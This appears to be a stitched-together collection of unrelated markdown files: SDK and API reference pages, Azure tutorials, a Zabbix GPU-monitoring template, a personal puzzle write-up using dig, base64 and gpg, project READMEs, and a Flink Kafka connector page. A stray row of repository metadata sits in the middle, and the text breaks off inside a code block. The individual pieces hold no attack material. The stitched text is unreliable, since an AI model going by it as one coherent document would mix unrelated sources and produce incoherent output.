# SmartPiGarageDoor
SmartThings integration of Raspberry Pi Garage Door
# FactSet.SDK.SecuritizedDerivativesAPIforDigitalPortals.Model.InlineResponse2005DataLifeCycle
Values and value ranges related to important dates.
## Properties
Name | Type | Description | Notes
------------ | ------------- | ------------- | -------------
**Issue** | [**InlineResponse2005DataLifeCycleIssue**](InlineResponse2005DataLifeCycleIssue.md) | | [optional]
**Maturity** | [**InlineResponse2005DataLifeCycleMaturity**](InlineResponse2005DataLifeCycleMaturity.md) | | [optional]
**Callable** | [**List<InlineResponse2005DataLifeCycleMaturityPerpetual>**](InlineResponse2005DataLifeCycleMaturityPerpetual.md) | Indicates whether callable and non-callable securitized derivatives are among the results. A callable securitized derivative is one that may be redeemed by the issuer prior to maturity. | [optional]
**Valuation** | [**InlineResponse2005DataLifeCycleValuation**](InlineResponse2005DataLifeCycleValuation.md) | | [optional]
**Repayment** | [**InlineResponse2005DataLifeCycleRepayment**](InlineResponse2005DataLifeCycleRepayment.md) | | [optional]
[[Back to Model list]](../README.md#documentation-for-models) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to README]](../README.md)
---
title: Coarse relocalization in Unity
description: Learn in detail how to create and locate anchors that use coarse relocalization in a C# application.
author: bucurb
manager: dacoghl
services: azure-spatial-anchors
ms.author: bobuc
ms.date: 09/19/2019
ms.topic: tutorial
ms.service: azure-spatial-anchors
ms.openlocfilehash: 5c976bd020d37672c44c89113bf7786e1ccf141b
ms.sourcegitcommit: 87781a4207c25c4831421c7309c03fce5fb5793f
ms.translationtype: MT
ms.contentlocale: hu-HU
ms.lasthandoff: 01/23/2020
ms.locfileid: "76548254"
---
# <a name="how-to-create-and-locate-anchors-using-coarse-relocalization-in-c"></a>How to create and locate anchors using coarse relocalization in C#
> [!div class="op_single_selector"]
> * [Unity](set-up-coarse-reloc-unity.md)
> * [Objective-C](set-up-coarse-reloc-objc.md)
> * [Swift](set-up-coarse-reloc-swift.md)
> * [Android Java](set-up-coarse-reloc-java.md)
> * [C++/NDK](set-up-coarse-reloc-cpp-ndk.md)
> * [C++/WinRT](set-up-coarse-reloc-cpp-winrt.md)
Azure Spatial Anchors can associate the anchors it creates with positioning sensor data on the device. This data can be used to quickly determine whether there are any anchors near the device. For more information, see [Coarse relocalization](../concepts/coarse-reloc.md).
## <a name="prerequisites"></a>Prerequisites
To complete this guide, make sure you have:
- A basic knowledge of C#.
- Read the [Azure Spatial Anchors overview](../overview.md).
- Completed one of the [5-minute quickstarts](../index.yml).
- Read the [Create and locate anchors overview](../create-locate-anchors-overview.md).
[!INCLUDE [Configure Provider](../../../includes/spatial-anchors-set-up-coarse-reloc-configure-provider.md)]
```csharp
// Create the sensor fingerprint provider
PlatformLocationProvider sensorProvider = new PlatformLocationProvider();
// Allow GPS
sensorProvider.Sensors.GeoLocationEnabled = true;
// Allow WiFi scanning
sensorProvider.Sensors.WifiEnabled = true;
// Allow a set of known BLE beacons
sensorProvider.Sensors.BluetoothEnabled = true;
sensorProvider.Sensors.KnownBeaconProximityUuids = new[]
{
"22e38f1a-c1b3-452b-b5ce-fdb0f39535c1",
"a63819b9-8b7b-436d-88ec-ea5d8db2acb0",
. . .
};
```
[!INCLUDE [Configure Provider](../../../includes/spatial-anchors-set-up-coarse-reloc-configure-session.md)]
```csharp
// Set the session's sensor fingerprint provider
cloudSpatialAnchorSession.LocationProvider = sensorProvider;
// Configure the near-device criteria
NearDeviceCriteria nearDeviceCriteria = new NearDeviceCriteria();
nearDeviceCriteria.DistanceInMeters = 5;
nearDeviceCriteria.MaxResultCount = 25;
// Set the session's locate criteria
AnchorLocateCriteria anchorLocateCriteria = new AnchorLocateCriteria();
anchorLocateCriteria.NearDevice = nearDeviceCriteria;
cloudSpatialAnchorSession.CreateWatcher(anchorLocateCriteria);
```
[!INCLUDE [Locate](../../../includes/spatial-anchors-create-locate-anchors-locating-events.md)]
[!INCLUDE [Configure Provider](../../../includes/spatial-anchors-set-up-coarse-reloc-next-steps.md)]
# \DeploymentsApi
All URIs are relative to *https://localhost*
Method | HTTP request | Description
------------- | ------------- | -------------
[**ContextGet**](DeploymentsApi.md#ContextGet) | **Get** /v1/context/{request_id}/{security_number} | Allow to get the Context of a deployment
[**Deploy**](DeploymentsApi.md#Deploy) | **Post** /v1/deploy | Allow to deploy a new Instance of an App
[**DeploymentDelete**](DeploymentsApi.md#DeploymentDelete) | **Delete** /v1/stop/{request_id} | Allow to stop an instance for the client
[**DeploymentGetLogs**](DeploymentsApi.md#DeploymentGetLogs) | **Get** /v1/deployment/{request_id}/container-logs | Allow to get the Container Logs of a Deployment
[**DeploymentStatusGet**](DeploymentsApi.md#DeploymentStatusGet) | **Get** /v1/status/{request_id} | Allow to get The current status of a request
[**DeploymentsGet**](DeploymentsApi.md#DeploymentsGet) | **Get** /v1/deployments | Allow to get the List of Deployments
[**SelfDeploymentDelete**](DeploymentsApi.md#SelfDeploymentDelete) | **Delete** /v1/self/stop/{request_id}/{access_point_id} | Allow to stop an instance for the client from inside a container
# **ContextGet**
> Deployment ContextGet(ctx, requestId, securityNumber, authorization)
Allow to get the Context of a deployment
Request deployment context info. You should use this URL inside your deployment. The URL is injected in your deployment and can be found via the environment variable named ARBITRIUM_CONTEXT_URL
### Required Parameters
Name | Type | Description | Notes
------------- | ------------- | ------------- | -------------
**ctx** | **context.Context** | context for authentication, logging, cancellation, deadlines, tracing, etc.
**requestId** | **string**| Unique Identifier to keep track of your request across all Arbitrium ecosystem. |
**securityNumber** | **int32**| Random Security number generate to validate the request id. |
**authorization** | **string**| Auto Generated token. This token is injected in your deployment and can be found via the environment variable named ARBITRIUM_CONTEXT_TOKEN |
### Return type
[**Deployment**](Deployment.md)
### Authorization
No authorization required
### HTTP request headers
- **Content-Type**: application/json
- **Accept**: application/json
[[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md)
# **Deploy**
> Request Deploy(ctx, payload)
Allow to deploy a new Instance of an App
Deploy an Application
### Required Parameters
Name | Type | Description | Notes
------------- | ------------- | ------------- | -------------
**ctx** | **context.Context** | context for authentication, logging, cancellation, deadlines, tracing, etc.
**payload** | [**DeployModel**](DeployModel.md)| |
### Return type
[**Request**](Request.md)
### Authorization
[apikey](../README.md#apikey)
### HTTP request headers
- **Content-Type**: application/json
- **Accept**: application/json
[[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md)
# **DeploymentDelete**
> Delete DeploymentDelete(ctx, requestId, optional)
Allow to stop an instance for the client
Delete a deployment
### Required Parameters
Name | Type | Description | Notes
------------- | ------------- | ------------- | -------------
**ctx** | **context.Context** | context for authentication, logging, cancellation, deadlines, tracing, etc.
**requestId** | **string**| Unique Identifier to keep track of your request across all Arbitrium ecosystem. It's included in the response of the app deploy, example: 93924761ccde |
**optional** | ***DeploymentsApiDeploymentDeleteOpts** | optional parameters | nil if no parameters
### Optional Parameters
Optional parameters are passed through a pointer to a DeploymentsApiDeploymentDeleteOpts struct
Name | Type | Description | Notes
------------- | ------------- | ------------- | -------------
**containerLogStorage** | **optional.String**| If you want to enable the container log storage for the deployment. You can put 'true' if you already have endpoint storage associated with your deployment's app version. You can put 'false' if it is enabled by default and you want to disable it for this specific request. Or you can put the name of your endpoint storage and if it is valid we will store the container logs. |
### Return type
[**Delete**](Delete.md)
### Authorization
[apikey](../README.md#apikey)
### HTTP request headers
- **Content-Type**: application/json
- **Accept**: application/json
[[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md)
# **DeploymentGetLogs**
> DeploymentLogs DeploymentGetLogs(ctx, requestId)
Allow to get the Container Logs of a Deployment
Get a deployment container log.
### Required Parameters
Name | Type | Description | Notes
------------- | ------------- | ------------- | -------------
**ctx** | **context.Context** | context for authentication, logging, cancellation, deadlines, tracing, etc.
**requestId** | **string**| |
### Return type
[**DeploymentLogs**](DeploymentLogs.md)
### Authorization
[apikey](../README.md#apikey)
### HTTP request headers
- **Content-Type**: application/json
- **Accept**: application/json
[[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md)
# **DeploymentStatusGet**
> Status DeploymentStatusGet(ctx, requestId)
Allow to get The current status of a request
Get Deployment Request status
### Required Parameters
Name | Type | Description | Notes
------------- | ------------- | ------------- | -------------
**ctx** | **context.Context** | context for authentication, logging, cancellation, deadlines, tracing, etc.
**requestId** | **string**| Unique Identifier to keep track of your request across all Arbitrium ecosystem. It's included in the response of the app deploy, example: 93924761ccde |
### Return type
[**Status**](Status.md)
### Authorization
[apikey](../README.md#apikey)
### HTTP request headers
- **Content-Type**: application/json
- **Accept**: application/json
[[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md)
# **DeploymentsGet**
> Deployments DeploymentsGet(ctx, )
Allow to get the List of Deployments
Get All Deployments
### Required Parameters
This endpoint does not need any parameter.
### Return type
[**Deployments**](Deployments.md)
### Authorization
[apikey](../README.md#apikey)
### HTTP request headers
- **Content-Type**: application/json
- **Accept**: application/json
[[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md)
# **SelfDeploymentDelete**
> Delete SelfDeploymentDelete(ctx, requestId, accessPointId, authorization, optional)
Allow to stop an instance for the client from inside a container
Self-delete a deployment. You should use this URL inside your deployment. The URL is injected in your deployment and can be found via the environment variable named ARBITRIUM_DELETE_URL
### Required Parameters
Name | Type | Description | Notes
------------- | ------------- | ------------- | -------------
**ctx** | **context.Context** | context for authentication, logging, cancellation, deadlines, tracing, etc.
**requestId** | **string**| Unique Identifier to keep track of your request across all Arbitrium ecosystem. It's included in the response of the app deploy, example: 93924761ccde |
**accessPointId** | **int32**| Access Point Number provided by our system |
**authorization** | **string**| Auto Generated token. This token is injected in your deployment and can be found via the environment variable named ARBITRIUM_DELETE_TOKEN |
**optional** | ***DeploymentsApiSelfDeploymentDeleteOpts** | optional parameters | nil if no parameters
### Optional Parameters
Optional parameters are passed through a pointer to a DeploymentsApiSelfDeploymentDeleteOpts struct
Name | Type | Description | Notes
------------- | ------------- | ------------- | -------------
**containerLogStorage** | **optional.String**| If you want to enable the container log storage for the deployment. You can put 'true' if you already have endpoint storage associated with your deployment's app version. You can put 'false' if it is enabled by default and you want to disable it for this specific request. Or you can put the name of your endpoint storage and if it is valid we will store the container logs. |
### Return type
[**Delete**](Delete.md)
### Authorization
No authorization required
### HTTP request headers
- **Content-Type**: application/json
- **Accept**: application/json
[[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md)
---
title: Download Media Services assets to your computer - Azure | Microsoft Docs
description: Learn how to download assets to your computer. The code samples are written in C# and use the Media Services SDK for .NET.
services: media-services
documentationcenter: ''
author: juliako
manager: femila
editor: ''
ms.assetid: 8908a1dd-3ffb-4f18-955d-4c8e2d82fc5d
ms.service: media-services
ms.workload: media
ms.tgt_pltfrm: na
ms.devlang: na
ms.topic: article
ms.date: 03/18/2019
ms.author: juliako
ms.openlocfilehash: 21fcc6ae09718ffbb22e1d438926586dd3cde71d
ms.sourcegitcommit: be32c9a3f6ff48d909aabdae9a53bd8e0582f955
ms.translationtype: MT
ms.contentlocale: zh-TW
ms.lasthandoff: 04/26/2020
ms.locfileid: "61465655"
---
# <a name="how-to-deliver-an-asset-by-download"></a>How to: Deliver an asset by download
This article discusses the options for delivering media assets that have been uploaded to Media Services. You can deliver Media Services content in numerous application scenarios. After encoding, download the produced media assets, or access them by using a streaming locator. To improve performance and scalability, you can also deliver content through a Content Delivery Network (CDN).
This example shows how to download media assets from Media Services to your local computer. The code queries for the job associated with the Media Services account by job ID and accesses its **OutputMediaAssets** collection (the set of one or more output media assets that result from running the job). The example downloads the output media assets of a job, but you can download other assets in the same way.
>[!NOTE]
>There is a limit of 1,000,000 policies for the different AMS policies (for example, Locator policies or ContentKeyAuthorizationPolicy). Use the same policy ID if you always use the same days / access permissions, for example, policies for locators that are intended to remain in place for a long time (non-upload policies). For more information, see [this](media-services-dotnet-manage-entities.md#limit-access-policies) article.
```csharp
// Download the output asset of the specified job to a local folder.
static IAsset DownloadAssetToLocal( string jobId, string outputFolder)
{
// This method illustrates how to download a single asset.
// However, you can iterate through the OutputAssets
// collection, and download all assets if there are many.
// Get a reference to the job.
IJob job = GetJob(jobId);
// Get a reference to the first output asset. If there were multiple
// output media assets you could iterate and handle each one.
IAsset outputAsset = job.OutputMediaAssets[0];
// Create a SAS locator to download the asset
IAccessPolicy accessPolicy = _context.AccessPolicies.Create("File Download Policy", TimeSpan.FromDays(30), AccessPermissions.Read);
ILocator locator = _context.Locators.CreateLocator(LocatorType.Sas, outputAsset, accessPolicy);
BlobTransferClient blobTransfer = new BlobTransferClient
{
NumberOfConcurrentTransfers = 20,
ParallelTransferThreadCount = 20
};
var downloadTasks = new List<Task>();
foreach (IAssetFile outputFile in outputAsset.AssetFiles)
{
// Use the following event handler to check download progress.
outputFile.DownloadProgressChanged += DownloadProgress;
string localDownloadPath = Path.Combine(outputFolder, outputFile.Name);
Console.WriteLine("File download path: " + localDownloadPath);
downloadTasks.Add(outputFile.DownloadAsync(Path.GetFullPath(localDownloadPath), blobTransfer, locator, CancellationToken.None));
outputFile.DownloadProgressChanged -= DownloadProgress;
}
Task.WaitAll(downloadTasks.ToArray());
return outputAsset;
}
static void DownloadProgress(object sender, DownloadProgressChangedEventArgs e)
{
Console.WriteLine(string.Format("{0} % download progress. ", e.Progress));
}
```
## <a name="media-services-learning-paths"></a>Media Services learning paths
[!INCLUDE [media-services-learning-paths-include](../../../includes/media-services-learning-paths-include.md)]
## <a name="provide-feedback"></a>Provide feedback
[!INCLUDE [media-services-user-voice-include](../../../includes/media-services-user-voice-include.md)]
## <a name="see-also"></a>See also
[Deliver streaming content](media-services-deliver-streaming-content.md)
# Intel QuickSync GPU metrics
## Overview
This is a template for monitoring the integrated video (Intel Quick Sync) in Intel processors.
You can monitor these parameters:
Multi-Format Codec Engine (also known as “MFX” or “VDBOX”); Video Encode (PAK) and Decode
2nd instance of the MultiFormat Codec Engine, if available (Examples of supported processor include 5th generation of Intel® Core™ processors with Intel® HD Graphics 6000, Intel® Iris™ Graphics 6100, Intel® Iris™ Pro Graphics 6200, Intel® Iris™ Pro Graphics P6300); Video Encode (PAK) and Decode
Video Quality Engine (also known as “VEBOX” or Video Quality enhancement pipeline) Deinterlace, Denoise
Render Engine (Execution units, media samplers, VME and their caches) Video Encode (ENC), OpenCL, Video Scaling, VPP Composition including frame rate conversion and image stabilization, VPP copy to CPU
GT Frequency
First of all, you need to prepare the utility that collects the parameters.
You need to build metrics\_monitor from the repo: https://github.com/Intel-Media-SDK/MediaSDK
For correct operation you may need to add the line 'run = 0;' at the end of the 'while' loop in cttmetrics\_sample.cpp:
while(run)
...
if (true == isFreq)
printf("\tGT Freq: %4.2f", metric\_values[3]);
printf("\n");
run = 0;
}
Add rules to sudoers:
Defaults:zabbix !requiretty
zabbix ALL=(ALL) NOPASSWD: /opt/intel/mediasdk/tools/metrics\_monitor/\_bin/metrics\_monitor
And add the needed UserParameter to the zabbix-agent configuration:
UserParameter=gpu.metrics[*],sudo /opt/intel/mediasdk/tools/metrics\_monitor/\_bin/metrics\_monitor "$2" "$3" | sed 's/ usage://g' | sed 's/\t/\n/g' | sed 's/,//g' | sed 's/T F/T\_F/g' | grep "$1" | awk '{print $ 2}'
## Author
Kirill Savin
## Macros used
There are no macros links in this template.
## Template links
There are no template links in this template.
## Discovery rules
There are no discovery rules in this template.
## Items collected
|Name|Description|Type|Key and additional info|
|----|-----------|----|----|
|$1 usage|<p>Multi-Format Codec Engine (also known as “MFX” or “VDBOX”) Video Encode (PAK) and Decode</p>|`Zabbix agent`|gpu.metrics["VIDEO ",100,500]<p>Update: 30s</p>|
|$1 usage|<p>Video Quality Engine (also known as “VEBOX” or Video Quality enhancement pipeline) Deinterlace, Denoise</p>|`Zabbix agent`|gpu.metrics["VIDEO_E",100,500]<p>Update: 30s</p>|
|$1 usage|<p>2nd instance of the MultiFormat Codec Engine, if available (Examples of supported processor include 5th generation of Intel® Core™ processors with Intel® HD Graphics 6000, Intel® Iris™ Graphics 6100, Intel® Iris™ Pro Graphics 6200, Intel® Iris™ Pro Graphics P6300) Video Encode (PAK) and Decode</p>|`Zabbix agent`|gpu.metrics["VIDEO2",100,500]<p>Update: 30s</p>|
|$1 usage|<p>Render Engine (Execution units, media samplers, VME and their caches) Video Encode (ENC), OpenCL, Video Scaling, VPP Composition including frame rate conversion and image stabilization, VPP copy to CPU</p>|`Zabbix agent`|gpu.metrics["RENDER",100,500]<p>Update: 30s</p>|
|$1 usage|<p>GT Freq</p>|`Zabbix agent`|gpu.metrics["GT_Freq",100,500]<p>Update: 30s</p>|
## Triggers
There are no triggers in this template.
[tailwindcss-fa-svg-loading-variants](../README.md) / [Exports](../modules.md) / __tests__/variants
# Module: \_\_tests\_\_/variants
# BookingAPI
A little exercise about APIs
WARNING
=======
The following exercise is just a personal experiment that I would like to keep private, but, you know, **this humble princess can't afford 5 Aussie golden coins a month**, so this is my *__disclaimer of liability__*:
The humble code that you find in this repo may not help anybody with anything in particular, it may not be my own code, so it may contain somebody else's code, and as you may guess, it may have really horrible mistakes, typos and bad programming practices.
:information_desk_person:
# badr-challenge
### A friend of mine wrote a challenge for me. I'm solving it here :)
1 **first step**</br> He asked me to generate a pair of GPG keys and send the public key to him. </br>
`$ gpg --full-generate-key` </br>
2 **second step**</br> He sent me an image: </br>
Well, that image contained hidden text inside of it; he wrote in the instructions that I should extract that text: </br>
`$ cat black.hole` </br>
3 **third step**</br>
The text is: *Follow the txt in the* [marone.pythops.com](https://marone.pythops.com) </br>
If you go to that URL in the browser it's not going to work! That's the trick, because by *follow the txt* he meant checking the value of the TXT DNS record!!! </br>
`$ dig -t txt marone.pythops.com` </br>
The value of the TXT record is: *"aHR0cDovL3hscWlxenlid2FxN3NlbWliNXRxNGlkejc0bGdzcGx5czI1Mmdlb3ozdTdnZ3M3a3Z1bWV1NXFkLm9uaW9uL2NoYWxsZW5nZQ=="* </br>
4 **fourth step**</br>
Well, this is a Base64 string, so I need to decode it back to text: </br>
`$ echo aHR0cDovL3hscWlxenlid2FxN3NlbWliNXRxNGlkejc0bGdzcGx5czI1Mmdlb3ozdTdnZ3M3a3Z1bWV1NXFkLm9uaW9uL2NoYWxsZW5nZQ== | base64 --decode` </br>
5 **fifth step**</br>
Once again the output is a URL: [it's a .onion link!](http://xlqiqzybwaq7semib5tq4idz74lgsplys252geoz3u7ggs7kvumeu5qd.onion/challenge) which means I should install the [Tor browser](https://www.torproject.org/download/) in order to open that link. </br> By going to that link I got a file to download; after downloading it, I figured out that it is encrypted, which is why he asked me to generate the GPG key. </br>I decrypted the file: </br>
`$ gpg --output doc --decrypt challenge` </br>
The text in the file is: *Build an API that returns the public IPv4 or IPv6. So people can know easily their public IPs*, which is the final step.
6 **sixth step**</br> Building the API.
## awesome-oak
This is a list of community projects related to [oak](https://oakserver.github.io/oak/) middleware and router server framework for Deno.
If you know of resources that would be great to list here, just create a [pull request](https://github.com/oakserver/awesome-oak/pulls).
### Getting Started
- [Official Site](https://oakserver.github.io/oak/)
### Middleware
- [oak_middleware](https://oakserver.github.io/middleware/) a collection of maintained middleware for oak.
- [view-engine](https://github.com/deligenius/view-engine) 🚀a Template View Engine for Deno frameworks.
- [multiparser](https://github.com/deligenius/multiparser) a Deno module for parsing multipart/form-data.
- [error handling & logging](https://github.com/halvardssm/oak-middleware-error-logger) an error handling middleware with a logger.
- [jwt](https://github.com/halvardssm/oak-middleware-jwt) a JWT validation middleware.
- [session](https://github.com/denjucks/session) a session middleware for oak with Redis support.
- [organ](https://github.com/denjucks/organ) a logging middleware based on the morgan middleware from ExpressJS.
- [snelm](https://github.com/denjucks/snelm) a security middleware ported from the helmet middleware from ExpressJS.
- [validator](https://github.com/halvardssm/oak-middleware-validator) a validator for body content and url parameters.
- [upload](https://github.com/hviana/Upload-middleware-for-Oak-Deno-framework) performs uploads, organizes uploads to avoid file system problems and creates dirs if they do not exist, performs validations, and optimizes RAM usage when uploading large files using Deno standard libraries.
### Examples/Templates/Boilerplates
- [deno_crud_jwt](https://github.com/22mahmoud/deno_crud_jwt) 🦕 basic jwt implementation with CRUD operations using oak + postgres.
### Testing
- [superoak](https://github.com/asos-craigmorten/superoak) HTTP assertions for Oak made easy via SuperDeno.
### Tutorials
| 58.939394 | 275 | 0.779949 | eng_Latn | 0.684739 |
e03aa309b9960c6c4957de6307c3c6f379576aa7 | 1,241 | md | Markdown | doc/markdown/users/polynomials.md | smtrat/carl-windows | 22b3a7677477cdbed9adc7619479ce82a0304666 | [
"MIT"
] | 29 | 2015-05-19T12:17:16.000Z | 2021-03-05T17:53:00.000Z | doc/markdown/users/polynomials.md | smtrat/carl-windows | 22b3a7677477cdbed9adc7619479ce82a0304666 | [
"MIT"
] | 36 | 2016-10-26T12:47:11.000Z | 2021-03-03T15:19:38.000Z | doc/markdown/users/polynomials.md | smtrat/carl-windows | 22b3a7677477cdbed9adc7619479ce82a0304666 | [
"MIT"
] | 16 | 2015-05-27T07:35:19.000Z | 2021-03-05T17:53:08.000Z | Polynomials {#polynomials}
=====
In order to represent polynomials, we define the following hierarchy of classes:
- Coefficient: Represents the numeric coefficient..
- Variable: Represents a variable.
- Monomial: Represents a product of variables.
- Term: Represents a product of a constant factor and a Monomial.
- MultivariatePolynomial: Represents a polynomial in multiple variables with numeric coefficients.
We consider these types to be embedded in a hierarchy like this:
- MultivariatePolynomial
- Term
- Monomial
- Variable
- Coefficient
We will abbreviate these types as C, V, M, T, MP.
## UnivariatePolynomial
Additionally, we define a UnivariatePolynomial class.
It is meant to represent either a univariate polynomial in a single variable, or a multivariate polynomial with a distinguished main variable.
In the former case, a number type is used as template argument. We call this a _univariate polynomial_.
In the latter case, the template argument is instantiated with a multivariate polynomial. We call this a _univariately represented polynomial_.
A UnivariatePolynomial, regardless if univariate or univariately represented, is mostly compatible to the above types.
@subpage polynomials_operators
# Prefs
SharedPreferences in Android
```Java
public class PrefsApplication extends Application {
@Override
public void onCreate() {
super.onCreate();
// Initialize the Prefs class
new ManagerPrefs.Builder()
.setContext(this)
.setMode(ContextWrapper.MODE_PRIVATE)
.setPrefsName(getPackageName())
.setUseDefaultSharedPreference(true).build();
}
}
```
# Usage
After initialization, you can use simple one-line methods to save values to the shared preferences anywhere in your app, such as:
- `Prefs.putString(key, string)`
- `Prefs.putLong(key, long)`
- `Prefs.putBoolean(key, boolean)`
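For instance, persisting a few values after the one-time initialization above might look like this (a minimal sketch; the key names and values are made up for illustration):

```Java
// Anywhere in the app after PrefsApplication.onCreate() has run:
Prefs.putString("username", "roger");
Prefs.putLong("last_sync", System.currentTimeMillis());
Prefs.putBoolean("first_run", false);
```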
https://jitpack.io
Add it to your build.gradle with:
```gradle
allprojects {
repositories {
maven { url "https://jitpack.io" }
}
}
```
and:
```gradle
dependencies {
compile 'com.github.rogerp91:prefs-shared:{latest version}'
}
```
### Based
- [EasyPreferences](https://github.com/Pixplicity/EasyPreferences)
### License
Copyright 2016 Roger Patiño
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
---
title: "Apache Kafka Connector"
nav-title: Kafka
nav-parent_id: connectors
nav-pos: 1
---
<!--
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
-->
Flink provides an [Apache Kafka](https://kafka.apache.org) connector for reading data from and writing data to Kafka topics with exactly-once guarantees.
* This will be replaced by the TOC
{:toc}
## Dependency
Apache Flink ships with a universal Kafka connector which attempts to track the latest version of the Kafka client.
The version of the client it uses may change between Flink releases.
Modern Kafka clients are backwards compatible with broker versions 0.10.0 or later.
For details on Kafka compatibility, please refer to the official [Kafka documentation](https://kafka.apache.org/protocol.html#protocol_compatibility).
<div class="codetabs" markdown="1">
<div data-lang="universal" markdown="1">
{% highlight xml %}
<dependency>
<groupId>org.apache.flink</groupId>
<artifactId>flink-connector-kafka{{ site.scala_version_suffix }}</artifactId>
<version>{{ site.version }}</version>
</dependency>
{% endhighlight %}
</div>
</div>
Flink's streaming connectors are not currently part of the binary distribution.
See how to link with them for cluster execution [here]({% link dev/project-configuration.md %}).
## Kafka Consumer
Flink's Kafka consumer - `FlinkKafkaConsumer` provides access to read from one or more Kafka topics.
The constructor accepts the following arguments:
1. The topic name / list of topic names
2. A DeserializationSchema / KafkaDeserializationSchema for deserializing the data from Kafka
3. Properties for the Kafka consumer.
The following properties are required:
- "bootstrap.servers" (comma separated list of Kafka brokers)
- "group.id" the id of the consumer group
<div class="codetabs" markdown="1">
<div data-lang="java" markdown="1">
{% highlight java %}
Properties properties = new Properties();
properties.setProperty("bootstrap.servers", "localhost:9092");
properties.setProperty("group.id", "test");
DataStream<String> stream = env
.addSource(new FlinkKafkaConsumer<>("topic", new SimpleStringSchema(), properties));
{% endhighlight %}
</div>
<div data-lang="scala" markdown="1">
{% highlight scala %}
val properties = new Properties()
properties.setProperty("bootstrap.servers", "localhost:9092")
properties.setProperty("group.id", "test")
val stream = env
.addSource(new FlinkKafkaConsumer[String]("topic", new SimpleStringSchema(), properties))
{% endhighlight %}
</div>
</div>
### The `DeserializationSchema`
The Flink Kafka Consumer needs to know how to turn the binary data in Kafka into Java/Scala objects.
The `KafkaDeserializationSchema` allows users to specify such a schema. The `T deserialize(ConsumerRecord<byte[], byte[]> record)` method gets called for each Kafka message, passing the value from Kafka.
For convenience, Flink provides the following schemas out of the box:
1. `TypeInformationSerializationSchema` (and `TypeInformationKeyValueSerializationSchema`) which creates
a schema based on a Flink's `TypeInformation`. This is useful if the data is both written and read by Flink.
This schema is a performant Flink-specific alternative to other generic serialization approaches.
2. `JsonDeserializationSchema` (and `JSONKeyValueDeserializationSchema`) which turns the serialized JSON
into an ObjectNode object, from which fields can be accessed using `objectNode.get("field").as(Int/String/...)()`.
The KeyValue objectNode contains a "key" and "value" field which contain all fields, as well as
an optional "metadata" field that exposes the offset/partition/topic for this message.
3. `AvroDeserializationSchema` which reads data serialized with Avro format using a statically provided schema. It can
infer the schema from Avro generated classes (`AvroDeserializationSchema.forSpecific(...)`) or it can work with `GenericRecords`
with a manually provided schema (with `AvroDeserializationSchema.forGeneric(...)`). This deserialization schema expects that
the serialized records DO NOT contain embedded schema.
    - There is also a version of this schema available that can look up the writer's schema (the schema which was used to write the record) in
      [Confluent Schema Registry](https://docs.confluent.io/current/schema-registry/docs/index.html). Using this deserialization schema, the
      record will be read with the schema that was retrieved from Schema Registry and transformed to a statically provided reader schema (either through
      `ConfluentRegistryAvroDeserializationSchema.forGeneric(...)` or `ConfluentRegistryAvroDeserializationSchema.forSpecific(...)`).
<br>To use this deserialization schema one has to add the following additional dependency:
<div class="codetabs" markdown="1">
<div data-lang="AvroDeserializationSchema" markdown="1">
{% highlight xml %}
<dependency>
<groupId>org.apache.flink</groupId>
<artifactId>flink-avro</artifactId>
<version>{{site.version }}</version>
</dependency>
{% endhighlight %}
</div>
<div data-lang="ConfluentRegistryAvroDeserializationSchema" markdown="1">
{% highlight xml %}
<dependency>
<groupId>org.apache.flink</groupId>
<artifactId>flink-avro-confluent-registry</artifactId>
<version>{{site.version }}</version>
</dependency>
{% endhighlight %}
</div>
</div>
When encountering a corrupted message that cannot be deserialized for any reason the deserialization schema should return null which will result in the record being skipped.
Due to the consumer's fault tolerance (see below sections for more details), failing the job on the corrupted message will let the consumer attempt to deserialize the message again.
Therefore, if deserialization still fails, the consumer will fall into a non-stop restart and fail loop on that corrupted message.
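As an illustration, the following sketch (not taken from the connector itself; the class name and the UTF-8 assumption are arbitrary choices) implements a `KafkaDeserializationSchema` that skips records whose value cannot be decoded by returning `null`:

{% highlight java %}
import org.apache.flink.api.common.typeinfo.TypeInformation;
import org.apache.flink.api.common.typeinfo.Types;
import org.apache.flink.streaming.connectors.kafka.KafkaDeserializationSchema;
import org.apache.kafka.clients.consumer.ConsumerRecord;

import java.nio.charset.StandardCharsets;

public class SkippingStringDeserializationSchema implements KafkaDeserializationSchema<String> {

    @Override
    public boolean isEndOfStream(String nextElement) {
        return false; // the Kafka stream is unbounded
    }

    @Override
    public String deserialize(ConsumerRecord<byte[], byte[]> record) {
        try {
            return new String(record.value(), StandardCharsets.UTF_8);
        } catch (Exception e) {
            return null; // returning null makes the consumer skip this record
        }
    }

    @Override
    public TypeInformation<String> getProducedType() {
        return Types.STRING;
    }
}
{% endhighlight %}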
### Kafka Consumers Start Position Configuration
The Flink Kafka Consumer allows configuring how the start positions for Kafka partitions are determined.
<div class="codetabs" markdown="1">
<div data-lang="java" markdown="1">
{% highlight java %}
